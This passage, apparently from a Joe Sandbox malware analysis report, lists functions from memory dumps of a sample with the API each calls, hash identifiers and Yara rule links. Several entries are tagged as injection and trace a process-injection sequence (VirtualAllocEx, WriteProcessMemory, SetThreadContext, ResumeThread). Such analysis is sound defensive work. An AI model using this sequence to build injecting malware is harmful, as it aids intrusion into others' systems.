                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 3c527d7a261aeb651e6ff32f0e523c9e40263cb2377bb90fb05500e18581295d
                                  • Instruction ID: ae426f8af2f0558d2bac17045030267b21d0c8a735f25b7c667a3dcb218c70e1
                                  • Opcode Fuzzy Hash: 3c527d7a261aeb651e6ff32f0e523c9e40263cb2377bb90fb05500e18581295d
                                  • Instruction Fuzzy Hash: 232113B1D013099FCB14DFAAC985BEEBBF5FF48310F50842AE919A7250C7789955CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548D028 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0548D0B8
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 01e8f4cbf4a6d45f4c7ddfaac841092525e834e8f4fff2f6d4f34f16bd861f48
                                  • Instruction ID: 8e7224123875e3a764a7a858526c11e3339024e5565e838a107cbed01756eb0a
                                  • Opcode Fuzzy Hash: 01e8f4cbf4a6d45f4c7ddfaac841092525e834e8f4fff2f6d4f34f16bd861f48
                                  • Instruction Fuzzy Hash: 562125B1D013099FCB10DFAAC985BEEBBF5FF48310F50842AE919A7240C7789944CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00CCD0E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00CCDA06,?,?,?,?,?), ref: 00CCDAC7
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 1f49d8782662fa32ffe5bcf83eeac329a30af6686a4f6d9e67ba38c0345b2812
                                  • Instruction ID: b096368966621e69b1a1d3da2ef49803799a21b755ad7863ee52151c074741d1
                                  • Opcode Fuzzy Hash: 1f49d8782662fa32ffe5bcf83eeac329a30af6686a4f6d9e67ba38c0345b2812
                                  • Instruction Fuzzy Hash: 0421E5B5900208AFDB10CF9AD584ADEBBF9FB48310F14841AE915A3310D379A940DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548CE88 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0548CF0E
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: ee12adf493e4bba204eaca4a93b88482955bec32193e793fb1ed5a326b18696a
                                  • Instruction ID: 6c9ba7ccb807c4d3e4ed2ddbf2769d67d33930045cf7f4de0503214ca8407dd4
                                  • Opcode Fuzzy Hash: ee12adf493e4bba204eaca4a93b88482955bec32193e793fb1ed5a326b18696a
                                  • Instruction Fuzzy Hash: 5C2168B1D002088FDB10DFAAC4847EEBBF4FF48314F14842AD519A7241CB789945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548D116 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0548D198
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: a0e47650fd132ba1c4d829258e94ba6771212c1dec01503b8db465388c5ca11f
                                  • Instruction ID: 1f58b762ad3e176ccf056afabbff2091be7ff0a1230d211c0c7dbd14c845dba7
                                  • Opcode Fuzzy Hash: a0e47650fd132ba1c4d829258e94ba6771212c1dec01503b8db465388c5ca11f
                                  • Instruction Fuzzy Hash: 9521F5B1D012499FDB14DFAAC985AEEBBF5FF48310F50842AE519A7250C7789944CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548D118 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0548D198
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 912219e5cf180430b64c3a8e714d98a6747a5343cea553da66fad2ac7386a2ea
                                  • Instruction ID: 556adf95783236dd70d770857b4db071fa55658568dadaebd2f0a2317f35521a
                                  • Opcode Fuzzy Hash: 912219e5cf180430b64c3a8e714d98a6747a5343cea553da66fad2ac7386a2ea
                                  • Instruction Fuzzy Hash: 992107B1D013499FDB10DFAAC985AEEFBF5FF48310F50842AE519A7250C778A944CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548CF60 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0548CFD6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 359c2e98f3f9aef59ef4b9126e51374153a72e4d3139d953d405e3378a5163f2
                                  • Instruction ID: c11f031103e8b7db7321bef9e5b34547e328640f5573f70c742c583ff1bd404a
                                  • Opcode Fuzzy Hash: 359c2e98f3f9aef59ef4b9126e51374153a72e4d3139d953d405e3378a5163f2
                                  • Instruction Fuzzy Hash: 1C214772D002499FCB10DFA9D845AEFBFF5EF88310F10881AE51AA7250C7799940CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00CCAFB0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CCB841,00000800,00000000,00000000), ref: 00CCBA52
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: e1706026e7d8744921ccceb440c12fc9127db262f016bfe686857fee6d8cfed3
                                  • Instruction ID: a6e4fb4b32108befdc534091d23849abdd3749f20f9ebe7b861bc2452bc8058f
                                  • Opcode Fuzzy Hash: e1706026e7d8744921ccceb440c12fc9127db262f016bfe686857fee6d8cfed3
                                  • Instruction Fuzzy Hash: 831114B6C003499FDB10CF9AD444B9EFBF8EB48310F10842EE519A7200C379A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548CF68 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0548CFD6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: dfe39d171254b095443c5a721fa377bb9b6137a9701660cfb607aaa672cc07ef
                                  • Instruction ID: 95faee0e8f46a73f7ea78846d4b03aa99f11271ca97cd25f9220b7e2197b0793
                                  • Opcode Fuzzy Hash: dfe39d171254b095443c5a721fa377bb9b6137a9701660cfb607aaa672cc07ef
                                  • Instruction Fuzzy Hash: F111F6759002499FDB10DFAAC845AEFBFF5EF48320F14841AE519A7250C779A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548CDD8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 62fa259f4bdb82c17240f852d90866f1eacf69616a02105af5d3fb08a6fe565c
                                  • Instruction ID: c2109b22632e153f8789fc78620f391ded7890efb8b7bb90fb9fe92eb66e964e
                                  • Opcode Fuzzy Hash: 62fa259f4bdb82c17240f852d90866f1eacf69616a02105af5d3fb08a6fe565c
                                  • Instruction Fuzzy Hash: 311146B1D002488BCB20DFAAC4457EFBFF4EF88324F24841AD519A7250CB799944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00CCB9E1 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CCB841,00000800,00000000,00000000), ref: 00CCBA52
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c14e51bd9e0e5c8f6c45b490a30a7faa03960ae5a6e102c64df25e630fb26153
                                  • Instruction ID: d1446689f315a55b03a2fcd5c17127d73cee7861249b938e25130bb9d9215cbb
                                  • Opcode Fuzzy Hash: c14e51bd9e0e5c8f6c45b490a30a7faa03960ae5a6e102c64df25e630fb26153
                                  • Instruction Fuzzy Hash: 9E1112B6D002098FCB14CF9AD544B9EFBF5AB48310F10842ED529A7210C778AA45CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0548CDE0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2322508183.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_5480000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 33f037909ec0af3e11eeac310c28c92ce02ae239b2633d9fda1b8a32d520eb5b
                                  • Instruction ID: 9c801a76ff11b94c407b74a58939d0bce28d39d2d6c57d056f3ebd7dab944983
                                  • Opcode Fuzzy Hash: 33f037909ec0af3e11eeac310c28c92ce02ae239b2633d9fda1b8a32d520eb5b
                                  • Instruction Fuzzy Hash: F11128B1D002488BCB20DFAAC4457EFFBF5EF88720F10841AD519A7240CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00CCB760 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00CCB7C6
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2309156352.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_cc0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 0e547ad9601b80a28ee8c6cf2c864ab7e260f9aff1059ece24479072b9498d20
                                  • Instruction ID: 1ffea79b760b0844df7ecd873ca530dcb166c98c1bde7cf930b6408c642f577c
                                  • Opcode Fuzzy Hash: 0e547ad9601b80a28ee8c6cf2c864ab7e260f9aff1059ece24479072b9498d20
                                  • Instruction Fuzzy Hash: 4B11DFB5C002498FCB10DFAAD444B9EFBF8EF89710F10845AD829B7610C379A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0D1A11F8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D1A125D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2325507551.000000000D1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D1A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_d1a0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ef46918e3ae732272123d737754b8ca860f7375441cca895fae4818f72c5d3ba
                                  • Instruction ID: e7ab68d54cad13137796fd1bd04495c64554e8e61e5292ae6f72e5352700b106
                                  • Opcode Fuzzy Hash: ef46918e3ae732272123d737754b8ca860f7375441cca895fae4818f72c5d3ba
                                  • Instruction Fuzzy Hash: 8711B0B98003499FDB10DF99D585BEEBBF8FB58310F20841AD559A7210C379A984CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0D1A1200 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D1A125D
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2325507551.000000000D1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D1A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_d1a0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: bd4760ed902554ef5cb90d5cb9be9213789017ea827e7bdd812429fdbf41954d
                                  • Instruction ID: 9d450b1e2b49bad17594366f232aa87e56b64f0117afbf67813ef0d12e2f3c96
                                  • Opcode Fuzzy Hash: bd4760ed902554ef5cb90d5cb9be9213789017ea827e7bdd812429fdbf41954d
                                  • Instruction Fuzzy Hash: B411D3B58003499FDB10DF9AD985BDEBBF8FB48320F20841AD518B7200C379A584CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBFC39 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nq
                                  • API String ID: 0-2756854522
                                  • Opcode ID: a5b0cc523537e741983e8db344b11bcdf2074a5fe7a084f2aab322a1484e5358
                                  • Instruction ID: 5adbf5aecfba7e8c954201e028f0e42a3d3910ba7302f805f2861160b88f4a5d
                                  • Opcode Fuzzy Hash: a5b0cc523537e741983e8db344b11bcdf2074a5fe7a084f2aab322a1484e5358
                                  • Instruction Fuzzy Hash: B331B031E0425A8FCB04DFB9D8541EEBFF2FF89310F2581AAD505F7255EA3069168B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBA8F0 Relevance: .7, Instructions: 728COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42e94c7ffb1f4a5a64a0ee83e483e9a2614bf4a4d1d7c88d3b8504dd787f4891
                                  • Instruction ID: 23020102e2fd0f1b71d6267823df9c5ba827cf407a644a6a9a2e846330f51b17
                                  • Opcode Fuzzy Hash: 42e94c7ffb1f4a5a64a0ee83e483e9a2614bf4a4d1d7c88d3b8504dd787f4891
                                  • Instruction Fuzzy Hash: C5722D31910609CFDB15EF68C8946EDBBB1FF85305F0082A9D549AB265EB34AEC5CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB78A8 Relevance: .6, Instructions: 551COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02e83f794a852f511db8b4bd377f35ce952f04daee72c623d100e0c1a85f78b1
                                  • Instruction ID: 19a972e318faeacdd2733f65cd8baa612ec3d87ade9cd72fd3a705d33e2818a5
                                  • Opcode Fuzzy Hash: 02e83f794a852f511db8b4bd377f35ce952f04daee72c623d100e0c1a85f78b1
                                  • Instruction Fuzzy Hash: E3420831E006198FDB15EF68C8846EDF7B1FF89304F149699D499BB251EB30AA84CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBC1C8 Relevance: .5, Instructions: 500COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3f640b1e07427afd19e67b360bb3ce6192d3de01efdcba7d35b2148dae85135
                                  • Instruction ID: a448d9dd51cace7b8e43dfd4db1f87241a799b29f7f63a02cbf908c3a9c440f9
                                  • Opcode Fuzzy Hash: b3f640b1e07427afd19e67b360bb3ce6192d3de01efdcba7d35b2148dae85135
                                  • Instruction Fuzzy Hash: 77221830A00215CFDB14DF69C894AADB7B2FF89304F2495A8E54AAB365DB30ED45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBAA20 Relevance: .4, Instructions: 418COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f466e4a1b6499eb48202cd172a275f849cb296841dee099ad86e3a9ff3b514b0
                                  • Instruction ID: 4fc0110de3164f29480afaa9d4b0ca7a71bc3aaf9abe5fa750d06e69c35a2f1d
                                  • Opcode Fuzzy Hash: f466e4a1b6499eb48202cd172a275f849cb296841dee099ad86e3a9ff3b514b0
                                  • Instruction Fuzzy Hash: D312FA31E006198FDB15EF68C8946D9B7B1FF85305F0482A9D94AA7265EF34AEC5CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB7898 Relevance: .3, Instructions: 332COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 982e5be92f01840941080018b7c22ec9acb86537d84cab94d4dbc05b361b3c7f
                                  • Instruction ID: 0c9e85b9a41a1dda7d917c80debcb257fae7b679bc651224e2476a94a001e6f7
                                  • Opcode Fuzzy Hash: 982e5be92f01840941080018b7c22ec9acb86537d84cab94d4dbc05b361b3c7f
                                  • Instruction Fuzzy Hash: 04E11A31E006198FDB25DF68C8846EDB7B1FF89304F159699D499AB651EB30BE80CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBA271 Relevance: .2, Instructions: 202COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b57c35e0d3dd87751dd5aea2b210ec4d4e6c000edbfd79e2ca880e5a48a273e8
                                  • Instruction ID: a5fd1df7aa8f253cd1d6d6fa49a00ef219adf5b4bd97d24d4b2f508d5205aaa2
                                  • Opcode Fuzzy Hash: b57c35e0d3dd87751dd5aea2b210ec4d4e6c000edbfd79e2ca880e5a48a273e8
                                  • Instruction Fuzzy Hash: A091187190060ACFCB01DF68C8849D9FBB5FF49310B14C7AAE859EB256E774E985CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB3890 Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e0329ec01b51a08608c28fdb838f7403e377ed3609b392dd39face84d2bc729
                                  • Instruction ID: 3dd666f1bd642ee53907ef5218b50d9e52a06ceeaa2eb7fbb01829e838b24217
                                  • Opcode Fuzzy Hash: 8e0329ec01b51a08608c28fdb838f7403e377ed3609b392dd39face84d2bc729
                                  • Instruction Fuzzy Hash: EC717EB1E002099FDB10DFA9C941AEFFBF5EF88304F24811AD448A7255DB74AA46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB95F8 Relevance: .2, Instructions: 182COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a5294ec6f188e7fc0d8fcea1235562738ccd00ab39a932fb27758416c51a5a66
                                  • Instruction ID: d7764723ff9cfdb1a40f4d73cc5c0ebd3e16a1790144978d29b00e54cb20318a
                                  • Opcode Fuzzy Hash: a5294ec6f188e7fc0d8fcea1235562738ccd00ab39a932fb27758416c51a5a66
                                  • Instruction Fuzzy Hash: EB71DCB8600A00CFC718DF29C59895ABBF2FF8930571589A9E54ACB772EB31EC41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EBC1A0 Relevance: .2, Instructions: 176COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c6fd841450639b150dd9e059a6390c5245e1871a32e43f3230a178f311a15b3
                                  • Instruction ID: d6a17a8ee9ba10cd8759156188801758e04e509875eb6dc3d7b733251e8998e2
                                  • Opcode Fuzzy Hash: 6c6fd841450639b150dd9e059a6390c5245e1871a32e43f3230a178f311a15b3
                                  • Instruction Fuzzy Hash: 07618A306106008FDB14EF79C894BA977B2FF89314F1496BCD54A9B3A5DB70AC09CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB9418 Relevance: .2, Instructions: 172COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3eaa95cf619b915a63afd8be26951039c546c6c2dade0cf37910be0f718205e
                                  • Instruction ID: e10584d9ed25c900b01cb2fbe496ca7bee8265e4c8b977bdc9992f9b29fa689c
                                  • Opcode Fuzzy Hash: d3eaa95cf619b915a63afd8be26951039c546c6c2dade0cf37910be0f718205e
                                  • Instruction Fuzzy Hash: 1B71A1B4A056068FCB04CF69D584999FBF1FF48314B09C6A9E94ADB312E774E885CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB4034 Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58759db1eca7f983f64f73242c1b8a05f65ee7d2339bbfd9e2504bc790e33336
                                  • Instruction ID: c4078daaebc97882afe66910b3b51ea4a9fbb85e68f8a2eec256797049353e5d
                                  • Opcode Fuzzy Hash: 58759db1eca7f983f64f73242c1b8a05f65ee7d2339bbfd9e2504bc790e33336
                                  • Instruction Fuzzy Hash: 1F419F30E02218EFDB14EFA4E8545EEBBB2EF85315F118569D481A7395DB30AC55CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB387C Relevance: .2, Instructions: 155COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53f2fe5b97cf2222c988ac54833cd7bd1fabd941805b2f96747c4578b41b8a61
                                  • Instruction ID: b3819c92c06da8ac31238b5ff8f668e0387bfc6ef61e1dd5edd0a341ee0c3f64
                                  • Opcode Fuzzy Hash: 53f2fe5b97cf2222c988ac54833cd7bd1fabd941805b2f96747c4578b41b8a61
                                  • Instruction Fuzzy Hash: 06515F71E002099FDB14DFA9D904AEFBBF9EF88304F10841AD455E7255DB74A905CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04EB0040 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.2321304531.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_4eb0000_BjTxJte.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bfba3848e173863ff84c2f42a3c9d467559eac665727b908b6d5ae9f9195d2cd
                                  • Instruction ID: 8f926b24b2a7e46d5655f5da6826e40d79bdf374543b68e06af5b0f0ce84f3c3
                                  • Opcode Fuzzy Hash: bfba3848e173863ff84c2f42a3c9d467559eac665727b908b6d5ae9f9195d2cd
                                  • Instruction Fuzzy Hash: 0E41BB30A01A1A8FDF19EF69D954AEFBBB4EF88318F144165D805B7351EB70A900CBE0
                                  Uniqueness
